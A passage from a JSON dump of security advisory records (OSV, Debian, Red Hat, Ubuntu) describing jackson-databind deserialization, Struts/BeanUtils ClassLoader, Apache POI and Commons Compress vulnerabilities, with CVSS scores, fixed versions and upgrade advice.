["CVE-2019-12086"], "modified": "2023-04-11T01:40:59", "id": "OSV:GHSA-5WW9-J83M-Q7QX", "href": "https://osv.dev/vulnerability/GHSA-5ww9-j83m-q7qx", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-21T08:18:35", "description": "\nA Polymorphic Typing issue was discovered in jackson-databind, a JSON\nlibrary for Java. When Default Typing is enabled (either globally or\nfor a specific property) for an externally exposed JSON endpoint, the\nservice has the mysql-connector-java jar (8.0.14 or earlier) in the\nclasspath, and an attacker can host a crafted MySQL server reachable\nby the victim, an attacker can send a crafted JSON message that allows\nthem to read arbitrary local files on the server. This occurs because of\nmissing com.mysql.cj.jdbc.admin.MiniAdmin validation.\n\n\nFor Debian 8 Jessie, this problem has been fixed in version\n2.4.2-2+deb8u6.\n\n\nWe recommend that you upgrade your jackson-databind packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-05-21T00:00:00", "type": "osv", "title": "jackson-databind - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2022-07-21T05:52:39", "id": "OSV:DLA-1798-1", "href": "https://osv.dev/vulnerability/DLA-1798-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-21T08:13:14", "description": "\nIt was discovered that missing access checks in the Struts ActionForm object\ncould result in the execution of arbitrary code. This update fixes this\nproblem.\n\n\nFor Debian 6 Squeeze, these issues have been fixed in libstruts1.2-java version 1.2.9-4+deb6u1\n\n\n", "cvss3": {}, "published": "2014-09-17T00:00:00", "type": "osv", "title": "libstruts1.2-java - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2022-07-21T05:54:33", "id": "OSV:DLA-57-1", "href": "https://osv.dev/vulnerability/DLA-57-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:28:51", "description": "\nIt was discovered that missing access checks in the Struts ActionForm \nobject could result in the execution of arbitrary code.\n\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.9-5+deb7u1.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.2.9-9.\n\n\nWe recommend that you upgrade your libstruts1.2-java packages.\n\n\n", "cvss3": {}, "published": "2014-08-21T00:00:00", "type": "osv", "title": "libstruts1.2-java - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2022-07-21T05:48:17", "id": "OSV:DSA-2940-1", "href": "https://osv.dev/vulnerability/DSA-2940-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:37:38", "description": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.", "cvss3": {}, "published": "2020-06-10T23:38:01", "type": "osv", "title": "Arbitrary code execution in Apache Commons BeanUtils", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2023-04-11T01:37:35", "id": "OSV:GHSA-P66X-2CV9-QQ3V", "href": "https://osv.dev/vulnerability/GHSA-p66x-2cv9-qq3v", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-12-10T15:15:32", "description": "Package : jackson-databind\nVersion : 2.4.2-2+deb8u9\nCVE ID : CVE-2019-14540 CVE-2019-16335 CVE-2019-16942\n CVE-2019-16943\nDebian Bug : 940498 941530\n\nMore deserialization flaws were discovered in jackson-databind\nrelating to the classes in com.zaxxer.hikari.HikariConfig,\ncom.zaxxer.hikari.HikariDataSource, commons-dbcp and\ncom.p6spy.engine.spy.P6DataSource, which could allow an\nunauthenticated user to perform remote code execution. The issue was\nresolved by extending the blacklist and blocking more classes from\npolymorphic deserialization.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2.4.2-2+deb8u9.\n\nWe recommend that you upgrade your jackson-databind packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-02T22:48:42", "type": "debian", "title": "[SECURITY] [DLA 1943-1] jackson-databind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-02T22:48:42", "id": "DEBIAN:DLA-1943-1:5F5AB", "href": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T12:10:45", "description": "Package : jackson-databind\nVersion : 2.4.2-2+deb8u9\nCVE ID : CVE-2019-14540 CVE-2019-16335 CVE-2019-16942\n CVE-2019-16943\nDebian Bug : 940498 941530\n\nMore deserialization flaws were discovered in jackson-databind\nrelating to the classes in com.zaxxer.hikari.HikariConfig,\ncom.zaxxer.hikari.HikariDataSource, commons-dbcp and\ncom.p6spy.engine.spy.P6DataSource, which could allow an\nunauthenticated user to perform remote code execution. The issue was\nresolved by extending the blacklist and blocking more classes from\npolymorphic deserialization.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2.4.2-2+deb8u9.\n\nWe recommend that you upgrade your jackson-databind packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-02T22:48:42", "type": "debian", "title": "[SECURITY] [DLA 1943-1] jackson-databind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943"], "modified": "2019-10-02T22:48:42", "id": "DEBIAN:DLA-1943-1:9AD98", "href": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T12:14:29", "description": "Package : jackson-databind\nVersion : 2.4.2-2+deb8u6\nCVE ID : CVE-2019-12086\nDebian Bug : 929177\n\nA Polymorphic Typing issue was discovered in jackson-databind, a JSON\nlibrary for Java. When Default Typing is enabled (either globally or\nfor a specific property) for an externally exposed JSON endpoint, the\nservice has the mysql-connector-java jar (8.0.14 or earlier) in the\nclasspath, and an attacker can host a crafted MySQL server reachable\nby the victim, an attacker can send a crafted JSON message that allows\nthem to read arbitrary local files on the server. This occurs because of\nmissing com.mysql.cj.jdbc.admin.MiniAdmin validation.\n\n\nFor Debian 8 "Jessie", this problem has been fixed in version\n2.4.2-2+deb8u6.\n\nWe recommend that you upgrade your jackson-databind packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-05-21T12:59:15", "type": "debian", "title": "[SECURITY] [DLA 1798-1] jackson-databind security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2019-05-21T12:59:15", "id": "DEBIAN:DLA-1798-1:E389B", "href": "https://lists.debian.org/debian-lts-announce/2019/05/msg00030.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-04T04:17:51", "description": "Package : jackson-databind\nVersion : 2.4.2-2+deb8u6\nCVE ID : CVE-2019-12086\nDebian Bug : 929177\n\nA Polymorphic Typing issue was discovered in jackson-databind, a JSON\nlibrary for Java. When Default Typing is enabled (either globally or\nfor a specific property) for an externally exposed JSON endpoint, the\nservice has the mysql-connector-java jar (8.0.14 or earlier) in the\nclasspath, and an attacker can host a crafted MySQL server reachable\nby the victim, an attacker can send a crafted JSON message that allows\nthem to read arbitrary local files on the server. This occurs because of\nmissing com.mysql.cj.jdbc.admin.MiniAdmin validation.\n\n\nFor Debian 8 "Jessie", this problem has been fixed in version\n2.4.2-2+deb8u6.\n\nWe recommend that you upgrade your jackson-databind packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-05-21T12:59:15", "type": "debian", "title": "[SECURITY] [DLA 1798-1] jackson-databind security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2019-05-21T12:59:15", "id": "DEBIAN:DLA-1798-1:61C44", "href": "https://lists.debian.org/debian-lts-announce/2019/05/msg00030.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-03T05:07:31", "description": "Package : libstruts1.2-java\nVersion : 1.2.9-4+deb6u1\nCVE ID : CVE-2014-0114\n\nIt was discovered that missing access checks in the Struts ActionForm object \ncould result in the execution of arbitrary code. This update fixes this \nproblem.\nAttachment:\nsignature.asc\nDescription: This is a digitally signed message part.\n", "cvss3": {}, "published": "2014-09-17T12:59:07", "type": "debian", "title": "[SECURITY] [DLA 57-1] libstruts1.2-java security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-09-17T12:59:07", "id": "DEBIAN:DLA-57-1:29ABF", "href": "https://lists.debian.org/debian-lts-announce/2014/09/msg00014.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-23T22:37:52", "description": "Package : libstruts1.2-java\nVersion : 1.2.9-4+deb6u1\nCVE ID : CVE-2014-0114\n\nIt was discovered that missing access checks in the Struts ActionForm object \ncould result in the execution of arbitrary code. This update fixes this \nproblem.\nAttachment:\nsignature.asc\nDescription: This is a digitally signed message part.\n", "cvss3": {}, "published": "2014-09-17T12:59:07", "type": "debian", "title": "[SECURITY] [DLA 57-1] libstruts1.2-java security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-09-17T12:59:07", "id": "DEBIAN:DLA-57-1:6DE0E", "href": "https://lists.debian.org/debian-lts-announce/2014/09/msg00014.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-02T16:26:01", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2940-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nAug 21, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libstruts1.2-java\nCVE ID : CVE-2014-0114\n\nIt was discovered that missing access checks in the Struts ActionForm \nobject could result in the execution of arbitrary code.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.9-5+deb7u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.2.9-9.\n\nWe recommend that you upgrade your libstruts1.2-java packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-08-21T06:39:48", "type": "debian", "title": "[SECURITY] [DSA 2940-1] libstruts1.2-java security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-08-21T06:39:48", "id": "DEBIAN:DSA-2940-1:494C4", "href": "https://lists.debian.org/debian-security-announce/2014/msg00192.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2022-07-07T11:11:07", "description": "Apache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks: 1) Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294), and 2) Out of Memory Exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-30T02:19:46", "type": "redhatcve", "title": "CVE-2017-12626", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2022-07-07T08:54:25", "id": "RH:CVE-2017-12626", "href": "https://access.redhat.com/security/cve/cve-2017-12626", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T14:38:40", "description": "When reading a specially crafted ZIP archive, the read method of Apache Commons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the correct EOF indication after the end of the stream has been reached. When combined with a java.io.InputStreamReader this can lead to an infinite stream, which can be used to mount a denial of service attack against services that use Compress' zip package.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-08-17T03:02:24", "type": "redhatcve", "title": "CVE-2018-11771", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2023-04-06T05:27:15", "id": "RH:CVE-2018-11771", "href": "https://access.redhat.com/security/cve/cve-2018-11771", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T14:36:37", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.\n#### Mitigation\n\nThe following conditions are needed for an exploit, we recommend avoiding all if possible \n* Deserialization from sources you do not control \n* `enableDefaultTyping()` \n* `@JsonTypeInfo using `id.CLASS` or `id.MINIMAL_CLASS` \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-31T14:10:22", "type": "redhatcve", "title": "CVE-2019-16942", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942"], "modified": "2023-04-06T05:51:40", "id": "RH:CVE-2019-16942", "href": "https://access.redhat.com/security/cve/cve-2019-16942", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:36:36", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling.\n#### Mitigation\n\nThe following conditions are needed for an exploit, we recommend avoiding all if possible \n* Deserialization from sources you do not control \n* `enableDefaultTyping()` \n* `@JsonTypeInfo using `id.CLASS` or `id.MINIMAL_CLASS` \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-05T11:15:54", "type": "redhatcve", "title": "CVE-2019-16943", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16943"], "modified": "2023-04-06T05:52:31", "id": "RH:CVE-2019-16943", "href": "https://access.redhat.com/security/cve/cve-2019-16943", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:37:25", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.\n#### Mitigation\n\nThe following conditions are needed for an exploit, we recommend avoiding all if possible \n\n\n* Deserialization from sources you do not control \n* `enableDefaultTyping()` \n* `@JsonTypeInfo using `id.CLASS` or `id.MINIMAL_CLASS` \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-18T00:13:49", "type": "redhatcve", "title": "CVE-2019-12086", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2023-05-27T06:24:25", "id": "RH:CVE-2019-12086", "href": "https://access.redhat.com/security/cve/cve-2019-12086", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntucve": [{"lastseen": "2023-05-27T13:53:22", "description": "Apache POI in versions prior to release 3.17 are vulnerable to Denial of\nService Attacks: 1) Infinite Loops while parsing crafted WMF, EMF, MSG and\nmacros (POI bugs 61338 and 61294), and 2) Out of Memory Exceptions while\nparsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295).\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=888651>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", 